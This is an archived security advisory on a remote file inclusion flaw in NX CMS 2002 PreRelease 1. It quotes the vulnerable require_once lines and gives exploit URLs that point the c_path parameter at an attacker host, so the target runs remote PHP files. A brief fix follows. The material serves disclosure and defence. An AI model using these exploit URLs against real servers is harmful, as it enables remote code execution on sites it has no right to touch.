Informations : °°°°°°°°°°°°°° Website : http://nxwcms.sourceforge.net/ Version : 2002 PreRelease 1 Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° nx/common/cds/menu.inc.php : ----------------------------------------------------------- [...] require_once $c_path."common/lib/launch.inc.php"; [...] ----------------------------------------------------------- nx/common/dbo/datasets.php : ----------------------------------------------------------- <? require_once $c_path."common/dbo/saveset.php"; require_once $c_path."common/dbo/recordset.php"; require_once $c_path."common/dbo/deleteset.php"; require_once $c_path."common/dbo/updateset.php"; require_once $c_path."common/dbo/insertset.php"; [...] ----------------------------------------------------------- nx/common/lib/mass_opeations.inc.php : ----------------------------------------------------------- <? require_once $c_path."common/lib/launch.inc.php"; require_once $c_path."common/cds/menu.inc.php"; [...] ----------------------------------------------------------- etc... Exploits : °°°°°°°°°° http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ with : http://[attacker]/common/lib/launch.inc.php http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ with : http://[attacker]/common/dbo/saveset.php http://[attacker]/common/dbo/recordset.php http://[attacker]/common/dbo/deleteset.php http://[attacker]/common/dbo/updateset.php http://[attacker]/common/dbo/insertset.php etc... Solution : °°°°°°°°°° Add this line in bugged files : ----------------------------------------------------------------- if (!file_exists($c_path."index.php")){ die("Path not found."); } ----------------------------------------------------------------- A patch can be found on http://www.phpsecure.org . More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/NX.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNX.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
This archive was generated by hypermail 2b30 : Thu Jan 02 2003 - 18:51:27 PST